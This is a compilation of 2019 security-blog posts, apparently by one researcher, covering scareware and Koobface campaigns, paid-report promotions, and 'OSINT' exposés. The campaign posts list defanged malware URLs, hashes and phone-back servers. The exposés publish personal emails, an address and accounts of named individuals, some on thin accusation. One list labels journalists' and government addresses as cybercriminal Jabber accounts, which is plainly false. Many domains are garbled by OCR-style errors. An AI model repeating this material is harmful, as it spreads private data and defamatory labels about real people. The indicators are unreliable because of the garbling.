Historical OSINT - Massive Scareware Serving Campaign Spotted in the Wild (2019-05-04 22:41)

With scareware continuing to proliferate, I've recently intercepted a currently active malicious and fraudulent blackhat SEO campaign successfully enticing thousands of users into interacting with the rogue and malicious software, with the scareware behind the campaign successfully modifying the HOSTS file on the affected host, potentially exposing the user to a variety of fake search engines and similar rogue, fraudulent and malicious activity.

In this post I'll provide actionable intelligence on the infrastructure behind the campaign.

Sample malicious URL known to have participated in 
the campaign: 

hxxp://guardsys-zone.com/?p=WKmimHVmaWyHjsblo22EeXZeOKCfZlbVoKDb2YmHWJjOxaCbkXI%2Bal6orKWekJXIZWhimmVummWlo6THodjXoGJdpqmikpVuZ21uaHFtbl%2FEkKE%3D

Sample malicious MD5 known to have participated in 
the campaign: 

MD5: 665480a64d4f72a33120251c968e9c28 

Once executed, the sample modifies the HOSTS file and redirects the user to the following domains:

hxxp://google-reseach.com/gfeed/click.php?q=&p=1 - 66.36.243.201

hxxp://google-reseach.com/search.php?&aff=32210&saff=0&q=

Related malicious rogue and fraudulent URL known 
to have participated in the campaign: 

hxxp://88.85.73.139/landing/ 

Sample rogue and fraudulent payment processor used in the campaign:

hxxp://safetyself.com/safereports/ - 88.85.73.139

Historical OSINT - Yet Another Massive Scareware Serving Campaign Courtesy of the Koobface Gang (2019-05-05 16:47)

It's 2010 and I've recently intercepted a currently circulating malicious and fraudulent scareware-serving campaign courtesy of the Koobface Gang, this time successfully typosquatting my name within its command and control infrastructure.

In this post I'll provide actionable intelligence behind the campaign and will discuss in depth the infrastructure behind it.

Sample malicious and fraudulent domains known to 
have participated in the campaign: 

hxxp://qjcleaner.eu/hitin.php?affid=02979 

Sample malicious MD5 known to have participated in 
the campaign: 

MD5: 8df3e9c50bb4756f4434a9b7d6c23c8c 

Once executed a sample malware phones back to:

hxxp://212.117.160.18/install.php?id=02979

which is basically our dear friends at AS44042 ROOT-AS root eSolutions.

Parked at the same IP where [1]Crusade Affiliates continue serving a diverse set of fake security software are also [2]more scareware domains.

It's also worth pointing out that the Koobface gang has recently started typosquatting various domains using my name. The Koobface gang is [3]typosquatting my name for registering domains ([4]for instance Rancho Ranchev; Pancho Panchev etc.) including hxxp://mayernews.com - which is registered to Danchev Danch (land ruh.a l@gmail.com).

1. https://ddanchev.blogspot.com/2009/09/koobface-botnets-scareware-business.html

2. https://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html

3. https://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

4. https://ddanchev.blogspot.com/2009/11/koobface-botnets-scareware-business.html

Historical OSINT - Yet Another Massive Scareware-Serving Campaign Courtesy of the Koobface Gang (2019-05-05 17:19)

It's 2010 and I've recently come across yet another currently active scareware-serving campaign courtesy of the Koobface gang, this time successfully introducing a CAPTCHA-breaking module, potentially improving the propagation and distribution scale within major social networks.

In this post I'll discuss the campaign and provide actionable intelligence on the infrastructure behind it.

Related malicious domains known to have
participated in the campaign:

hxxp://goscandir.com/?uid=13301 - 91.212.107.103 -
hosting courtesy of [1]AS29550 - EUROCONNEX-AS
Blueconnex Networks Ltd Formally Euroconnex Networks
hxxp://ebeoxuw.cn/?uid=13301
hxxp://ebiezoj.cn/22/?uid=13301
hxxp://goscanhand.com/?uid=13301
hxxp://byxzeq.cn/22/?uid=13301

Sample malicious MD5 known to have participated in 
the campaign: 

MD5: 16575a1d40f745c2e39348c1727b8552

Once executed a sample malware phones back to:

hxxp://in5it.com/download/lpack.jpg - the actual executable

Related malicious MD5 known to have participated
in the campaign:

MD5: 1d5e3d78dd7efd8878075e5dbaa5c4fd

Related malicious MD5 known to have participated
in the campaign:

MD5: 6262c0cb1459adc8f278136f3cff2777

It's worth pointing out that prior to analyzing the campaign
it appears that the Koobface gang has recently introduced
a CAPTCHA-breaking module which basically relies
on the active outsourcing of the CAPTCHA-breaking
process potentially improving the Koobface spreading and
propagation effectiveness.

Sample malicious URL known to have participated in 
the campaign: 

hxxp://peacockalleyantiques.com/.sys/?getexe=v2googlecheck.exe

Sample malicious MD5 known to have participated in
the campaign:

MD5: cf9729bf3969df702767f3b9a131ec2c

Sample malicious URL known to have participated in
the campaign:

hxxp://peacockalleyantiques.com/.sys/?getexe=v2captcha.exe

Sample malicious MD5 known to have participated in
the campaign:

MD5: f2d0dbf1b11c5c2ff7e5f4c655d5e43e

Once executed a sample phones back to the
following C&C server IPs:

hxxp://capthcabreak.com/captcha/?a=get&i=0&v=14 -
67.212.69.230

hxxp://captchastop.com/captcha/?a=get&i=1&v=14 -
67.212.69.230

1. https://ddanchev.blogspot.com/2009/08/movement-on-koobface-front-part-two.html

Offensive Warfare 2.0 - The Future of Cyber Warfare
- Hacking and Cyber Security Community - Public
Registration Now Open! (2019-05-15 10:33)

Dear blog readers,

I wanted to let you know of my newly launched hacking and
security community - [1]Offensive Warfare 2.0 -
The Future of Cyber Warfare - Hacking and Cyber
Security Community - with public registration now open.

How you can help?

- Register today!

- Share this post with friends and colleagues.

- Approach me at dancho.danchev@hush.com with your
comments feedback and general suggestions

Stay tuned!

1. https://offensive-warfare.com/

Proprietary Threat Intelligence Reports Available On
Demand - Request a Copy Today! (2019-05-28 20:46)

Dear blog readers - I wanted to let everyone know of two -
currently in the works - proprietary Threat Intelligence
type of reports - that you and your organization can easily
acquire on demand. The first report details in-depth
including tactics techniques and procedures including
hundreds of IOCs (Indicators of Compromise) in terms of the
Pay-Per-Install Business Model circa 2008 - worth $1,500
and the second report which is also available on demand
details the inner workings of the CAPTCHA-Solving
Underground Market Business Model - which is also worth
$1,500.

Similar to my most recently - now publicly available - report
on "[1]Assessing The Computer Network Operation
(CNO) Capabilities of the Islamic Republic of Iran - Report"
capabilities including a complimentary social network graph
- the proprietary Threat Intelligence reports can be
requested online - and the user including the organization
will receive a complimentary copy of the report - including
a possible attribution vector - within 30 days prior to
making a purchase.

How you can order a copy of the report?

Feel free to approach me at dancho.danchev@hush.com to
inquire about making a purchase.

Stay tuned!

1. https://ddanchev.blogspot.com/2015/07/assessing-computer-network-operation_29.html

Proprietary Cybercrime and Dark Web Forum Search
Engine - BETA Access Available! (2019-05-28 20:48)

Dear blog readers - I wanted to let everyone know of a
currently active BETA project - namely - the general
invite-only proprietary access to a Cybercrime and Dark Web
Underground Forum Search Engine - exclusively targeting
Security Vendors the U.S Intelligence Community and Law
Enforcement including independent-vetted invite-only
subscription-based access to the World's largest and
near-real-time repository of Cybercrime Research Data - worth
$3,500 in the form of one-time payment - for the purpose of
fueling growth into the project - and to request the
necessary access - including possible subscription-based
agreement - further fueling growth into the project and the
quality of the inventory of data.

How to request access?

Feel free to approach me at dancho.danchev@hush.com
with your inquiry in terms of this project.

Stay tuned!

Dancho Danchev's Blog - Public Comments Now
Open! (2019-05-29 08:38)

Dear blog readers,

Ever since 2005 where I originally launched this blog - I
decided to turn off public comments so that I can
present a decent portion of my Information Security
knowledge to a diverse set of audiences. Back in the
glorious Web 2.0 years when I was busy doing business
development and PR outreach for a variety of Security
Projects I've recently decided that the time has come to
open public comments on one of the Security Industry's most
popular personal blogs on Information Security Cybercrime
Research and Threat Intelligence with the idea to reach out
to everyone reading this blog potentially building a
high-quality comment and research feedback network of
Security Industry members U.S Intelligence Community members
and the general public.

Looking forward to receiving your comments - and as always
feel free to go through the archives to catch up
with what I've been up to.

Stay tuned!

Dancho Danchev's Blog - Audio Version Available -
Listen to Every Post! (2019-05-30 16:15)

Dear blog readers,

I wanted to let everyone know that I've recently introduced
an audio-listening functionality to every blog post
basically allowing you to listen to every blog post on this
blog. What do you think?

Basically it allows you to easily plug and play your head-set
and listen on current historical and upcoming
posts. Stay tuned for an updated set of features to be
implemented anytime soon.

Consider going through the following high-profile Security
Interviews which I managed to produce throughout
2003-2006 while working for [1]Astalavista Security
Group.

- [2]Security Interviews 2004/2005 - Part 1

- [3]Security Interviews 2004/2005 - Part 2

- [4]Security Interviews 2004/2005 - Part 3

including the following commentary and Open Letter to the
U.S Intelligence Community:

- [5]The Threat Intelligence Market Segment - A
Complete Mockery and IP Theft Compromise - An
Open Letter to the U.S Intelligence Community

Enjoy and stay tuned!

1. https://packetstormsecurity.com/files/author/3007/

2. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-1.html

3. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-2.html

4. https://ddanchev.blogspot.com/2006/01/security-interviews-20042005-part-3.html

5. https://ddanchev.blogspot.com/2019/01/the-threat-intelligence-market-segment.html

Upcoming Security Project - Accepting Donations and
Feedback! (2019-05-30 17:11)

Dear blog readers I wanted to let everyone know that I've
recently added a "Donate Today!" button including a
Pop-Up banner within my blog with the idea to [1]seek your
donations and feedback to raise the necessary capital
for an upcoming Security Project.

How you can contribute in case you're a long-time reader of
this blog - and want to possibly see more high-quality
Security and Cybercrime research? Consider making
a modest $500 donation - which will better help me to
scale the project and eventually launch it.

Feel free to approach me at dancho.danchev@hush.com

Stay tuned!

1. https://form.jotformeu.com/91473099551363

Upcoming Offensive Warfare 2.0 Cyber Security and
Hacking Community YouTube Livestream Broadcast
- RSVP Today! (2019-07-02 11:17)

Dear blog readers,

I wanted to let everyone know that I'll be doing a Live
YouTube Broadcast - this Friday - 05/07/2019 20:30
P.M - Eastern European Summer Time (EEST), UTC +3 in
terms of [1]my newly launched Offensive Warfare 2.0 -
Cyber Security and Hacking Community. Are you
interested in attending and learning more about the
project?

[2]RSVP Today and consider [3]registering to get the
conversation going!

Feel free to approach me at dancho.danchev@hush.com

Stay tuned!

1. https://www.offensive-warfare.com/blogs/entry/1-offensive-warfare-20-official-community-launch-announcement/?ct=1562058688

2. https://offensive-warfare.app.rsvpify.com/

3. https://www.offensive-warfare.com/register

Exposing Bulgaria's Largest Data Leak - An OSINT
Analysis (2019-07-27 10:46)

I've recently come across a news article detailing the
recently leaked Bulgaria NAP records database and I
decided to take a closer look. What does this leak basically
constitute? Basically the attacker managed to compromise
the security of the Web Site basically leading to a successful
extraction of a decent-portion of data which could basically
constitute a leak.

NOTE: The data in this analysis has been obtained using
public sources.

In this post I'll profile a novice Bulgaria-based cybercriminal
that basically managed to obtain access to the
database and shared it within several cybercrime-friendly
forum communities making it publicly accessible including
an in-depth overview of TAD Group which is basically a
Bulgaria-based penetration testing company.

Real Name: Daniel Ganchev - Email: 
dani el.ganchev@abv.bg 

Sample URL of the cybercriminal involved in the 
campaign: 

hxxp://instakilla.com/ - Email: wp@instakilla.com; 
info@instakilla.com 

Instagram Account: hxxp://www.instagram.com/instakilla 
_/ 

Bitcoin address used in the campaign:

3Ex6LeHorgRjkBmws4SsRZ3FXSJDXk5FhP

Sample additional domain known to have been used
by the same individual: hxxp://209.250.232.143

Related URLs known to have participated in the
campaign:

hxxps://instakilla.com/5k.txt

hxxps://instakilla.com/teaser.txt

Sample Screenshot of the Original Letter Sent to
Journalists:

Let's take a closer look at the Bulgaria-based TAD-Group
which is basically a well-known penetration testing company
currently running Bulgaria's largest and most popular
hacking forum community - hxxp://www.xakep.bg which
was recently blamed for Bulgaria's largest database leak in
particular its founders and several employees in the context
of performing an OSINT analysis basically highlighting some
of the key functions of the company and its involvement
in the incident.

Sample Company Logo:

Sample Hacking Forum Logo:

Sample Exploits Developed courtesy of the founder
of the group:

Sample Photos of TAD Group Employees:

Sample TAD Group Photos:

Related personally identifiable information of TAD
members:

Real Name: Ivan Todorov 

Email: todorov _i@tadgroup.com; todorov_i@subway.bg 

Related social network accounts: 

hxxp://g ithub.com/chapoblan 
hxxp://www.facebook.com/chapoblan/ 

Sample Bulgaria Leaked Database URL: 

hxxp://uploadfiles.io/slp3gzh8 

Sample Email known to have been used in the 
campaign: 


Email: minfin_leak@yandex.ru

Sample MD5 known to have been used in the 
campaign: 

MD5: 3125f2f04d3bac84c418ceb321959aba 

It's also worth pointing out that I've managed to come
across a fraudulent proposition courtesy of the
hxxp://www.xakep.bg cybercrime-friendly forum
community with the cybercriminal behind it currently
soliciting managed hacker-for-hire type of services.

Sample screenshots courtesy of the service:

We'll be keeping an eye on the campaign and we'll post
updates as soon as new developments take place.

Who's Behind the Syrian Electronic Army? - An OSINT 
Analysis (2019-07-28 18:19) 

Continuing the "[1]FBI Most Wanted Cybercriminals"
series I've decided to continue providing actionable threat
intelligence on some of the most prolific and wanted
cybercriminals in the World through the distribution and
dissemination of actionable intelligence regarding some of
the most prolific and wanted cybercriminals.

Following a series of high-profile Web site defacement and
social media attack campaigns largely relying on
the utilization of good-old-fashioned social engineering
attack campaigns - it appears that the individuals behind
the Syrian Electronic Army are now part of [2]FBI's Most
Wanted Cyber Watch List which means that I've decided
to conduct an [3]OSINT analysis further sharing actionable
intelligence behind the group operators with the idea to
assist law enforcement and the U.S Intelligence Community
with the necessary data which could lead to a successful
tracking down and prosecution of the team behind these
campaigns.

In this post I'll provide actionable intelligence on the group
behind the Syrian Electronic Army including actionable
intelligence on the infrastructure on some of their most
prolific social engineering driven campaigns.

Sample Personal Photo of Ahmad Al Agha:

Sample Personal Photo of Firas Nur Al Din Dardar:

Sample Web Site Defacement Screenshot courtesy
of "The Shadow":

Sample Screenshots of the Syrian Electronic Army
Web Site Defacement Activity:

Related domains known to have participated in the
campaign:


Related IPs known to have participated in the 
campaign: 


Social Media Accounts: 


Skype account IDs known to have participated in the 
campaign: 


Related emails known to have participated in the 
campaign: 


We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 

1. https://ddanchev.blogspot.com/2019/01/exposing-irans-most-wanted.html

2. https://www.fbi.gov/wanted/cyber/ahmed-al-agha

3. https://www.fbi.gov/wanted/cyber/firas-dardar

Profiling a Currently Active Portfolio of High-Profile
Cybercriminal Jabber and XMPP Accounts
(2019-07-29 17:05)

In a world dominated by [1]fraudulent propositions it
should be noted that Jabber and XMPP remain the primary
secure communication channel for a large portion of
cybercrime-friendly propositions that I come across on a
daily basis largely relying on [2]Off-The-Record type of
functionality.

I've recently come across a public list of harvested and
data-mined high-profile cybercriminal's Jabber accounts
and I've decided to share it with my blog readers for
the purpose of establishing the foundations for a
successful "[3]lawful surveillance" and "[4]lawful
interception" type of operational activity.

nikki@teallmanagement.com 
nitasha _tiku@wired.com 
nix@evil.im 

notes@silversanction.com 

novathefed@xmpp.jp 

nozomu@neko.li 

nscola@politico.com 

nullboom@jabber.se 

nxf@evil.im 

nxro@xmpp.com 

nympho@riseup.net 



oakkaya@crypt.mn 

observernokuro@protonmail.com 

oedipus@xmpp.jp 

og@jabbim.cz 

oliver.laughland@theguardian.com 

oooo@riseup.net 

opgOd@riseup.net 

optic@revxp.com 

opyemen@riseup.net 

packet@null.pm 

pain@blackjabber.cc 

panic@riseup.net 

para@riseup.net 

pecxrOOt@creep.im 

pixelOrd@riseup.net 

pjs@wmeentertainment.com 

plasticmodem@programmer.net 

pmck@pmcklive.com 

pop@blackhat.cat 

poptartpounder@nigge.rs 



posters@worldstarhiphop.com 

prOb@jabber.se 

press@remove.pm 

press@vvpllc.com 

program@ardanradio.com 

proud@pomf.cat 

prvlulz@sigaint.org 

pureelite@conference.riseup.net 

purplecolor@blackjabber.cc 

rOOtsecur@xmpp.jp 

r3a@og.dk 

r@raylo.co 

racks@xmpp.jp 

raffi@strategiccyber.com 

raincoaster@unseen.is 

rapefugee@europe.com 

raun@riseup.net 

raymond.b@fuzagaming.us 
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razorblade@Onllne.cc 



redhack@activist.com 

refracts@lucky7.gg 

reklamajansi@mail.com 

rgctree@icloud.com 

richard.holmes@buzzfeed.com 

richiemalone@aol.com 

rift@xmpp.jp 

risatan@riseup.net 

riul872@jabber.se 

roOted@riseup.net 

robert.k@techie.com 

root@ic.fbi.gov 

root@leakbase.pw 

ryan@exploit.im 

ryan@rjgallagher.co.uk 

ryan@rm-rf.ninja 

ryan@thug.org 

s@sad.men 

salem@jabber.otr.im 

sarah.isgur.flores@usdoj.gov 



sasukels@exploit.im 

sauli@jabber.otr.im 

sceditorial@haymarket.com 

scene@black.intoxvs.info 

sean@evil.im 

secluded@evil.im 

secure@microsoft.com 

semaj@jabber.se 

servers@crypt.mn 

sest@protonmail.ch 

sheldon@creep.im 

shenron@evil.im 

sherazali@royallepage.ca 

shmOOp@lowermyjews.org 

shockanon@protonmail.com 

shodan@darkness.su 

shows@badazzmusic.com 

sicario@creep.im 

sifying@swissjabber.ch 

sinful@darkness.su 



sky berry86busi ness@aol.com 

slacka@nigge.rs 

snipersnague@xmpp.jp 

social@ironbuttz.com.au 

sohcra@riseup.net 

soulmech@creep.im 

soulmech@cryptostorm.is 

spencer.ackerman@thedailybeast.com 

spencerackerman@protonmail.com 
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spite@riseup.net 

spoof@thug.org 

stackoverflowin@tuta.io 

stank@blah.im 

steve@cnbc.com 

strive@null.pm 

stunned@xabber.de 

sudosev@protonmail.ch 

superspooki@exploit.im 

support@lookout.com 



support@ohrange.co 

support@spinrilla.com 

syncing@darkness.su 

syriancyberarmy@xtcmail.com 

tanzer@darerising.gg 

teampOison@riseup.net 

technology@huffingtonpost.com 

teepa@xmpp.jp 

teepee@csa.gg 

tehlulzywolf@jabber.otr.im 

telnet@lsd-25.ru 

teri@jabber.se 

testl23@0nllne.cc 

theoriginalyurei@xmpp.zone 

theralph@theralphretort.com 

tim@tagg.ly 

tips@popsci.com 

tips@techcrunch.com 

tmu@thug.org 

tommyb@creativesoulsmediagroup.com 



tongue@rickyberwick.com 

topol@tormail.org 

twitter@gusclass.com 

uchiha@thug.org 

ug@fbi.gov 

ug@jabber.se 

uglegion300@jabber.se 

unity.exe@riseup.net 

v0ld4m0rt@protonmail.com 

v8@evil.im 

v8@exploit.im 

vanda@vandathegod.com 

vc@cock.li 

vc@xmpp.is 

vegard@ufa.no 

vicious@riseup.net 

vickie@whitemanagement.co.uk 

videosawesome@mail.com 

vil@nigge.rs 

vill@xmpp.jp 
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violentexploit@xor.li 

vito@relyy.com 

voidsta@riseup.net 

volatile@digitalgangster.com 

voxi@evil.im 

warfare@live.com 

waters@lucky7.gg 

will@wstraf.me 

william@theoutline.com 

windanon@riseup.net 

wtf@protonmail.ch 

x64bit@exploit.im 

xeaned@swissjabber.ch 

xev@xmpp.jp 

yurei@yax.im 

z@exiled.si 

z@goat.si 

zen@exploit.im 

zihmp@cocaine. ninja 



zmb@jabber.se 

zora@jabb3r.de 

zyqnlc@jappix.io 

We'll post new updates and will update this list as soon as 
new developments take place. 

1. https://ddanchev.blogspot.com/2011/10/exposing-market-for-stolen-credit-cards_31.html

2. https://otr.cypherpunks.ca/

3. https://electrospaces.blogspot.com/2017/06/dutch-russian-cyber-crime-case-reveals.html

4. https://en.wikipedia.org/wiki/Lawful_interception
Exposing Evgeniy Mikhaylovich Bogachev and the
"Jabber ZeuS" Gang - An OSINT Analysis (2019-07-29 17:18)

Continuing the "[1]FBI Most Wanted Cybercriminals" series,
I've decided to take a closer look at the "Jabber ZeuS" gang,
including [2]Evgeniy Mikhaylovich Bogachev, for the purpose
of providing actionable intelligence on the fraudulent and
malicious infrastructure that was utilized in the campaign,
including personally identifiable information of the
individuals behind it, with the idea to assist law enforcement
and the U.S. Intelligence community with the necessary data
to track down and prosecute the individuals behind the
campaign.

In this post I'll provide actionable intelligence on the
infrastructure used by the "Jabber ZeuS" gang, including
personally identifiable information for Evgeniy Mikhaylovich
Bogachev and some of his known associates.

Sample Personal Photos of Evgeniy Mikhaylovich 
Bogachev: 
Slavik's IM and personal email including responding
IP:

bashorg@talking.ee - 112.175.50.220 

Personal Address: 

Lermontova Str. Anapa, Russian Federation 

Instant Messaging account: 

Iuckyl2345@jabber.cz 

Related name servers: 

ns.humboldtec.cz - 88.86.102.49 
ns2.humboldtec.cz - 188.165.248.173 

Related domains part of a C&C phone-back location:

hxxp://sl aviki-resl.com 
hxxp://slavikl.com - 91.213.72.115 
hxxp://slavik2.com 
hxxp://slavik3.com 

Slavik's primary email: 

Iuckycats2008@yahoo.com 

Slavik's ICQ numbers: 

ICQ - 42729771 
ICQ - 312456 
[Screenshot: "Zeus 2 vs. Zeus 2+ - Is the Zeus Project really dead?"]


Related emails known to have participated in the 
campaign: 

alexgarbar-ch uck@yahoo.com 

bollinger.evgeniy@yandex.ru 

charajiangl6@gmail.com 

Related domains known to have participated in the 
campaign: 

hxxp://visitcoastweekend.com - 103.224.182.253; 
70.32.1.32; 192.184.12.62; 141.8.224.93; 69.43.160.163 

hxxp://incomeet.com - 192.186.226.71; 66.199.248.195 

hxxp://work.businessclub.so 

Related information on his colleague (chingiz) as
seen in the attached screenshot:

Real Name: Galdziev Chingiz 

Related domains known to have participated in the 
campaign: 

hxxp://fizot.org 

hxxp://fizot.com - 50.63.202.35; 184.168.221.33 
hxxp://poymi.ru - 109.206.190.54 

Related name servers known to have participated in 
the campaign: 

nsl.fizot.com - 35.186.238.101 

ns2.fizot.com 

Related domain including an associated email using 
the same name server: 

hxxp://averfame.org - harold@avereanoia.org 

Google Analytics ID: UA-3816538 
Related domains known to have participated in the
campaign:

hxxp://a wmproxy.com 

hxxp://pornxplayer.com 

Related emails known to have participated in the 
campaign: 


fizot@mail.ru 



xtexgroup@gmail.com 

xtexcounter@bk.ru 

Related domains known to have responded to the 
same malicious and fraudulent IP - 178.162.188.28: 


Related domains known to have participated in the 
campaign: 



hxxp://fizot. I ivejournal.com/ 
hxxp://russi aru.net/fizot/ 

Instant Messaging Account: 

ICQ - 795781 

Related personally identifiable information of 
Galdziev Chingiz: 

hxxp://phpnow.ru 

ICQ - 434929 

Email: info@phpnow.ru 

Related domains known to have participated in the 
campaign: 

hxxp://fi I mv.net 

hxxp://fi nance-customer.com 

hxxp://fi relinesecrets.com 

hxxp://fl I mphpxpwqeyhj.net 

hxxp://fl sunstate333.com 

Related individuals known to have participated in the 
campaign: 

Slavik, Monstr, 100, Null, nvidiag, zebra7753, lexa _Mef,
gss, iceIX, Harderman, Gribodemon, Aqua, aquaSecond,
it, percent, cpOl, hct, xman, Pepsi, miami, miamibc,
petrOvich, Mr. ICQ, Tank, tankist, Kusunagi, Noname, Lucky,
Bashorg, Indep, Mask, Enx, Benny, Bentley, Denis Lubimov,
MaDaGaSka, Vkontake, rfcid, parik, reronic, Daniel, bxl,
Daniel Hamza, Danielbxl, jah, Jonni, jtk, Veggi Roma, D frank,
duo, Admin2010, h4x0rdz, Donsft, mary.J555, susanneon,
kainehabe, virus _e 2003, spaishp, sere.bro, muddem,
mechanlzm, vlad.dimitrov, jheto2002, sector.exploits

Related Instant Messaging accounts and emails 
known to have participated in the campaign: 




We'll post new updates as soon as new developments take 
place. 

Related posts: 

[3] Exposing Iran's Most Wanted Cybercriminals - FBI Most 
Wanted Checklist - OSINT Analysis 

[4] Who's Behind the Syrian Electronic Army? - An OSINT 
Analysis 

1. https://ddanchev.blogspot.com/2019/07/whos-behind-syrian-electronic-army.html

2. https://www.fbi.gov/wanted/cyber/evgeniy-mikhailovich-bogachev

3. https://ddanchev.blogspot.com/2019/01/exposing-irans-most-wanted.html

4. https://ddanchev.blogspot.com/2019/07/whos-behind-syrian-electronic-army.html
Profiling "Innovative Marketing" - The Flagship
Malvertising and Scareware Distributor - Circa 2008 -
An OSINT Analysis (2019-07-30 14:50)

Continuing the "[1]FBI Most Wanted Cybercriminals" series,
I've decided to take a closer look at "[2]Innovative
Marketing", the primary malvertising and scareware
distributor participating in several high-profile malvertising
and scareware-serving campaigns circa 2008, including
personally identifiable information on two of the main group
operators - [3]Shaileshkumar P. Jain and [4]Bjorn Daniel
Sundin - with the idea to provide law enforcement and the
U.S. Intelligence community with the necessary information
to track down and prosecute the gang behind these
campaigns.

In this post I'll provide actionable intelligence on the
infrastructure behind the "Innovative Marketing"
malvertising and scareware distributor circa 2008, including
personally identifiable information on two of the key
members of the gang.

Known "Innovative Marketing" alternative brand 
names and related associates: 

Billingnow
BillPlanet PTE Ltd.
Globedat
Innovative Marketing Ukraine
Revenue Response
Sunwell
Synergy Software BV
Winpayment Consultancy SPC
Winsecure Solutions
Winsolutions FZ-LLC
ByteHosting Internet Services, LLC
Setupahost.net

Known related campaigns and related brands 
launched by the same group: 

BurnAds 

UniqAds 

Infyte 

NetMediaGroup 

ForceUp

Related malicious and fraudulent domains known to 
have participated in the campaign: 



Related scareware products known to have been sold 
and distributed by "Innovative Marketing": 

SpyGuarder
Spy Killer Pro
Spyware Sweeper
SpywareIsolator
SwiftCleaner
SystemDoctor
SystemErrorFixer
SystemSweeper
TotalAntivirus
Trasheraser
Trustedprotection
UltimateCleaner
VirusRemover 2008
WinAntiSpyware
WinAntiVirusPro
WinBugFixer
WinDefender2008
WinFixer
Winsecureav
WinSpywareProtect
WinxDefender
XLifeGuarder
XP AntiSpyware 2009
XP AntiVirus

Related domains known to have participated in the 
campaign: 

hxxp://uti I isateursur.com 
hxxp://vaktmotvi rus.com 
hxxp://vei I igheidsagent.com 
hxxp://vi renvernichter.com 
hxxp://vi rusbekaemper.com 
hxxp://viruskrakker.com 
hxxp://vi russperr.com 
hxxp://vi rusurimuva.com 
hxxp://vi rusvanger.com 
hxxp://virusvijand.com 
hxxp://vol umformatredskap.com 
hxxp://wi rusufinisshu.com 
hxxp://wi rusuk.com 
hxxp://wi rusukyua.com 
hxxp://a boutstat.net 
hxxp://freeora ngestats.com 



hxxp://newstat.net 
hxxp://a boutstat.net 
hxxp://freeora ngestats.com 
hxxp://g etmosales.com 
hxxp://newstat.net 
hxxp://sexprofit.com 
hxxp://ad2cash.net 
hxxp://admi rag roup.com 
hxxp://a ntispyexpert.com 
hxxp://antispyexpertpro.com 
hxxp://g etmosales.com 
hxxp://mal warecrash.com 
hxxp://adtraff.com 
hxxp://bucksbill.com 
hxxp://bu rnads.com 
hxxp://forceup.com 
hxxp://freetvnow.com 
hxxp://g etfreecar.com 
hxxp://adtraff.com 
hxxp://adzyclon.com 



hxxp://checkm8.com 

hxxp://adtraff.com 

hxxp://blessedads.com 

hxxp://prevedmarketing.com 

hxxp://checkm8.com 

hxxp://newbieadg uide.com 
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hxxp://blessedads.com 
hxxp://preved marketing.com 
hxxp://mal warecrashpro.com 
hxxp://bestad media.com 
hxxp://bestsearch net.com 
hxxp://blessedads.com 
hxxp://bucksbill.com 
hxxp://bu rnads.com 
hxxp://bu rnads.com 
hxxp://casi noaceking.com 
hxxp://cry ptdrive.com 
hxxp://newbieadg uide.com 
hxxp://blessedads.com 



hxxp://prevedmarketing.com 

hxxp://fi leprotector.com 

hxxp://forceup.com 

hxxp://forceup.com 

hxxp://freetvnow.net 

hxxp://fu lsearch.com 

hxxp://games.biz 

hxxp://lmamis.net 

hxxp://l ndivid-search.com 

hxxp://lnformati on-advertising, info 

hxxp://lnfyte.com 

hxxp://g etfreecar.com 

hxxp://g reyhathosting.com 

hxxp://netmed iagroup.net 

hxxp://nettu rbopro.com 

hxxp ://newbieadg uide.com 

hxxp://g etfreecar.com 

hxxp ://g reyhathosting.com 

hxxp ://netmed iagroup.net 

hxxp ://nettu rbopro.com 



hxxp://newbieadg uide.com 
hxxp://g reyhathosting.com 
hxxp://i nstallprovider.com 
hxxp://l ibresystm.com 
hxxp://loffersearch.com 
hxxp://mag icsearcher.com 
hxxp://mal ware-scan.com 
hxxp://manage-sea rch.com 
hxxp://megashopcity.com 
hxxp://mi ghtyfaq.com 
hxxp://misc-search.com 
hxxp://moneycometrue.com 
hxxp://money palacecash.com 
hxxp://my health-1 ife.org 
hxxp://myon I inefinance.com 
hxxp://mysu rvey4u.com 
hxxp://netmed iagroup.net 
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hxxp://nettu rbopro.com 
hxxp://newbieadg uide.com 



hxxp://newstat.net 

hxxp://newbieadg uide.com 

hxxp://blessedads.com 

hxxp://prevedmarketing.com 

hxxp://pcsu percharger.com 

hxxp://performanceopti mizer.com 

hxxp://popu pnukerpro.com 

hxxp://prizesforyou.com 

hxxp://traffalo.com 

hxxp://uniqads.com 

hxxp://popadprovider.com 

hxxp://popsmedia.com 

hxxp://popu pnukerpro.com 

hxxp://prevedmarketing.com 

hxxp://prevedmarketing.com 

hxxp://prizesforyou.com 

hxxp://proxi mogroup.com 

hxxp://adtraff.com 

hxxp://bucksbill.com 

hxxp://bu rnads.com 



hxxp://forceup.com 
hxxp://freetvnow.com 
hxxp://proxi mogroup.com 
hxxp://rocktheads.com 
hxxp://rol ler-search.com 
hxxp://rombic-search.com 
hxxp://se7ensearch.com 
hxxp://sea rch-expand.com 
hxxp://sea rch-the-prey.com 
hxxp://Cry ptdrive.com 
hxxp://Deuscleanerpay.com 
hxxp://Easybestdeals.com 
hxxp://E roticabsolute.com 
hxxp://Marketi ngdungeon.com 
hxxp://Med iatornado.com 
hxxp://Megashopcity.com 
hxxp://M ightyfaq.com 
hxxp://Mobi lesoftmarketing.com 
hxxp://Moneycometrue.com 
hxxp://Money palacecash.com 



hxxp://Cheap-auto-deals.com 
hxxp://Checkstockl ist.com 
hxxp://Chushok.com 
hxxp://Clever-at-search.com 
hxxp://Mobi lesoftmarketing.com 
hxxp://Mobi letops.com 
hxxp://Mobilorg.org 
hxxp://Moneycometrue.com 
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hxxp://sea rchcolours.com 
hxxp://sea rchmandrake.com 
hxxp://sea rchonline-ease.com 
hxxp://sea rchoperation.com 
hxxp://sea rchvirtuoso.com 
hxxp://sel I moresoft.net 
hxxp://sel I mysoft.net 
hxxp://mal ware-scan.com 
hxxp://sharpad verts.com 
hxxp://sh ivanetworking.com 
hxxp://sh ivanetworking.com, 



hxxp://deusclea neronline.com 
hxxp://sh ivanetworking.com 
hxxp://si mplesamplesearch.com 
hxxp://soccernet 
hxxp://bu rnads.com, 
hxxp://adtech.de 
hxxp://blessedads.com, 
hxxp://performanceopti mizer.com 
hxxp://softwa rep rofit.com 
hxxp://softwcs.com 
hxxp://stratosearch.com 
hxxp://tal lgrass-seach.com 
hxxp://theri ngtonesource.com 
hxxp://traffalo.com 
hxxp://traveltray.com 
